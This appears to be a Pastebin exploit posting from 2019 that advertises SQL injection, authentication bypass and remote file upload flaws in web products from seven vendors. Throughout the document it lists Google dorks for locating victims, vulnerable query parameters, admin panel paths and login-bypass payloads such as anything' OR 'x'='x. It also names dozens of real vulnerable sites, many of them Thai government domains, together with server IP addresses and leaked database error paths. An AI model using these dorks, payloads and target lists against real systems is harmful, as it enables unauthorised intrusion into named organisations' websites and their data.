Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Vinayak * Royalways * Apurva Infosystems AxisCompuTech
- * Hands in Technology * Computerization Cell * TimesMedia Hosting * VivaDizayn *
- SQL Injection / Authentication Bypass / Remote File Upload
- ------------------------------------------------------------------------------------------------
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 26/01/2019
- # Vendor Homepages of Vulnerable Products :
- 1) vinayak.com
- 2) royalways.com
- 3) apurvainfosystems.com - axiscomputech.in
- 4) handsintechnology.com
- 5) wbprd.nic.in
- 6) timesmedia.co.th
- 7) vivadizayn.com
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CWE-264 [ Permissions, Privileges, and Access Controls ]
- CWE-592 [ Authentication Bypass Issues ]
- ####################################################################
- # There are 6 vendors that their products suffer from remote SQL Injection Vulnerabilities.
- ***************************************************************************
- 1) Designed by Vinayak SQL Injection Vulnerability
- 2) Website Design By Royalways SQL Injection and Authentication Bypass Vulnerability
- 3) Designed by Apurva Infosystems SQL Injection Vulnerability
- 4) Powered By Hands in Technology India SQL Injection Vulnerability
- 5) Designed & Developed By Computerization Cell
- National Informatics Centre India SQL Injection Vulnerability
- 6) TimesMedia.Co.Th ThailandGov SQL Injection and Multiple Vulnerabilities
- 7) Design - Technology VivaDizayn SQL Injection Vulnerability
- ####################################################################
- # Google Dorks for Vulnerable Different Products :
- ********************************************
- 1) intext:designed by Vinayak site:in
- 2) intext:Website Design By Royalways
- 3) intext:designed by : Apurva Infosystems
- intext:by Axis Computech & Peripherals Pvt. Ltd.
- 4) intext:Powered By : Hands in Technology site:in
- 5) intext:Designed & Developed By Computerization Cell
- intext:Designed and Developed by : National Informatics Centre
- 6) inurl:''/select_news.php?news_id='' site:go.th
- 7) intext:Design - Technology VivaDizayn
- ####################################################################
- 1) Designed by Vinayak SQL Injection Vulnerability
- ********************************************
- # Google Dork:
- **************
- intext:designed by Vinayak site:in
- # SQL Injection Exploit :
- ***********************
- /campusupdate.php?id=[SQL Injection]
- # Example Vulnerable Site :
- *************************
- [+] gnct.co.in/campusupdate.php?id=78%27
- Note => (50.28.79.232) => There are 369 domains hosted on this server.
- Note => (173.236.156.143) => There are 46 domains hosted on this server.
- # SQL Database Error :
- **********************
- Warning: mysql_connect(): Access denied for user 'gniot_cognew
- '@'localhost' (using password: YES) in /home/gnctgro7916
- /gnct.co.in/campusupdate.php on line 42
- ####################################################################
- 2) Website Design By Royalways SQL Injection and Authentication Bypass Vulnerability
- **************************************************************************
- # Google Dork:
- **************
- intext:Website Design By Royalways
- # SQL Injection Exploit :
- ***********************
- /new_arrival.php?count=[SQL Injection]
- # Admin Login Path :
- *******************
- /admin/
- # Authentication Bypass Exploit :
- *****************************
- Admin username => '=''or'
- Admin password => '=''or'
- /admin/home.php
- /admin/add_cat.php
- /admin/view_cat.php
- /admin/add_product.php
- /admin/view_products.php
- /admin/add_coupon.php
- /admin/manage_coupons.php
- /admin/orders_status.php?sort=New
- /admin/orders_status.php?sort=Pending
- /admin/orders_status.php?sort=Delivered
- /admin/manage_shipping.php
- /admin/manage_currency.php
- /admin/view_all_users.php
- /admin/chg_pwd.php
- # Example Vulnerable Site :
- *************************
- [+] hnh.in/new_arrival.php?count=1%27
- Note : (198.49.66.2) => There are 81 domains hosted on this server.
- Note : (198.49.66.5) => 1 Domain.
- # SQL Database Error :
- **********************
- Warning: mysql_num_rows() expects parameter 1 to be
- resource, boolean given in /home/hnhin/public_html
- /products_new_arrival.php on line 159
- ####################################################################
- 3) Designed by Apurva Infosystems SQL Injection Vulnerability
- ******************************************************
- # Google Dork :
- **************
- intext:designed by : Apurva Infosystems
- intext:by Axis Computech & Peripherals Pvt. Ltd.
- # SQL Injection Exploit :
- ***********************
- /index.php?id=[SQL Injection]
- /laptops.php?id=[SQL Injection]
- # Example Vulnerable Site :
- *************************
- [+] lenovoretail.in/index.php?id=1%27
- Note : (173.254.75.123) => There are 109 domains hosted on this server.
- Note : (208.79.234.118) => There are 90 domains hosted on this server.
- # SQL Database Error :
- **********************
- Warning: mysql_query(): Access denied for user
- ''@'localhost' (using password: NO) in /home
- /lenovoretail/public_html/index.php on line 59
- ####################################################################
- 4) Powered By Hands in Technology SQL Injection Vulnerability
- *******************************************************
- # Google Dork:
- **************
- intext:Powered By : Hands in Technology site:in
- # SQL Injection Exploit :
- ***********************
- /our-campaigns.php?id=[SQL Injection]
- # Example Vulnerable Site :
- *************************
- [+] struggleforjustice.in/our-campaigns.php?id=93%27
- Note : (108.167.158.159) => There are 58 domains hosted on this server.
- Note : (166.62.27.182) => There are 1,024 domains hosted on this server.
- # SQL Database Error :
- **********************
- Deprecated: mysql_query(): The mysql extension is deprecated
- and will be removed in the future: use mysqli or PDO instead in /home4/x0v7q0n7
- /public_html/struggleforjustice.in/our-campaigns.php on line 74
- ####################################################################
- 5) Designed & Developed By Computerization Cell
- National Informatics Centre India SQL Injection Vulnerability
- ******************************************************
- # Google Dork:
- **************
- intext:Designed & Developed By Computerization Cell
- intext:Designed and Developed by : National Informatics Centre
- # SQL Injection Exploit :
- ***********************
- /monthlyreport/cfcpgmonthlyreport.php?district=[SQL Injection]
- # Example Vulnerable Site :
- *************************
- [+] wbprdgpms.in/monthlyreport/cfcpgmonthlyreport.php?district=15%27
- Note : (164.100.178.145) => 2 Domains.
- Note : (202.61.117.157) => 1 Domain.
- # SQL Database Error :
- **********************
- Warning: mysql_fetch_array(): supplied argument is not a valid
- MySQL result resource in D:\xampp\htdocs\gpmsstatus
- \monthlyReport\cfcpgmonthlyreport.php on line 287
- ####################################################################
- 6) TimesMedia.Co.Th ThailandGov SQL Injection and Multiple Vulnerability
- ****************************************************************
- # Google Dork :
- *****************
- inurl:''/select_news.php?news_id='' site:go.th
- # CopyRight © 2015 www.timesmedia.co.th All Rights Reserved
- # Note : Thailand Government WebSites are vulnerable.
- # Admin Control Panel Login Path :
- *******************************
- /login_form.php
- /admin.php
- # SQL Injection Exploits :
- ***********************
- /contact.php?content_id=[SQL Injection]
- /base.php?content_id=[SQL Injection]
- /council.php?content_id=[SQL Injection]
- /history.php?content_id=[SQL Injection]
- /person.php?content_id=[SQL Injection]
- /vision.php?content_id=[SQL Injection]
- /memorable.php?content_id=[SQL Injection]
- /council.php?content_id=[SQL Injection]
- /travel.php?content_id=[SQL Injection]
- /stucture.php?content_id=[SQL Injection]
- /admin1.php?content_id=[SQL Injection]
- /otop.php?content_id=[SQL Injection]
- /news.php?id_type=[SQL Injection]
- /select_news.php?news_id=[SQL Injection]
- /policy.php?content_id=[SQL Injection]
- /office.php?content_id=[SQL Injection]
- /data.php?content_id=[SQL Injection]
- /strategy_plan.php?content_id=[SQL Injection]
- /activity/user_select_photo.php?news_id=[SQL Injection]
- /vdo/user_select_youtube.php?yt_id=[SQL Injection]
- Unauthorized Topic Add without Administrator Permission Exploit =>
- ***********************************************************
- TARGET/webboard/new.php?category=webboard
- TARGET/webboard/index.php?category=webboard
- Note : Use Mozilla Firefox Open Link No Redirect
- Extension to Bypass Admin Control Panel
- Download and Install on your Browser =>
- addons.mozilla.org/en-US/firefox/addon/noredirect/
- addons.mozilla.org/en-US/firefox/addon/open-link-directly-no-redirect/
- Try to use one of the SQL Authentication Exploit Payloads below if not works =>
- *******************************************************************
- Admin Username : anything' OR 'x'='x
- Admin Password : anything' OR 'x'='x
- Directory File Path : /fileupload/....
- Directory File Path : /activity/images/....
- Remote File Upload Exploit =>
- ****************************
- TARGET/admin/FCKeditor/editor/filemanager/upload/test.html
- /UserFiles/....
- Note : Only Thailand Government WebSites [ go.th ] are vulnerable for this issue.
- # Example Vulnerable Sites :
- **************************
- => Vulnerable IP Address => 61.19.250.25 =>
- There are 52 domains hosted on this server.
- Vendor Homepage Admin Panel => timesmedia.co.th/web58/admin/admin.php
- [+] banthan.go.th/policy.php?content_id=1%27 =>
- [ Proof of Concept for SQL Inj ] => archive.is/lkrrB
- [+] makluakao.go.th/webboard/index.php?category=webboard =>
- [ Proof of Concept ] => archive.is/azGk4
- [+] phoklang.go.th/news.php?id_type=4%27 =>
- [ Proof of Concept for RFU Vuln ] => archive.is/8wk57
- [+] chongsammor.go.th/select_news.php?news_id=410%27
- [+] dondang.go.th/base.php?content_id=7
- [+] hanna-ngam.go.th/admin1.php?content_id=10%27
- [+] wattananakhon.go.th/news.php?id_type=6%27
- [+] klonghinpoon.go.th/vision.php?content_id=5%27
- [+] nongpailomcity.go.th/data.php?content_id=1%27
- [+] banphokorat.go.th/data.php?content_id=4%27
- [+] buakho.go.th/history.php?content_id=4%27
- [+] janaud.go.th/stucture.php?content_id=27%27
- [+] waengnoiy.go.th/data.php?content_id=1%27
- [+] huanong.go.th/news.php?id_type=21%27
- [+] banthan.go.th/policy.php?content_id=1%27
- # SQL Database Error :
- *********************
- Warning: mysql_fetch_array() expects parameter 1 to be
- resource, boolean given in /home/phoklang/
- domains/phoklang.go.th/public_html/news.php on line 129
- ####################################################################
- 7) Design - Technology VivaDizayn SQL Injection Vulnerability
- *****************************************************
- # Google Dork:
- **************
- intext:Design - Technology VivaDizayn
- # SQL Injection Exploit :
- **********************
- /en/detay.php?id=[SQL Injection]
- # Example Vulnerable Site :
- ************************
- [+] rovelsan.com.tr/en/detay.php?id=696%27
- Note : (185.67.122.66) => There are 210 domains hosted on this server.
- # SQL Database Error :
- *********************
- Warning: mysql_fetch_array(): supplied argument is not a valid
- MySQL result resource in /home/rovelsant/domains
- /rovelsan.com.tr/public_html/en/detay.php on line 20
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement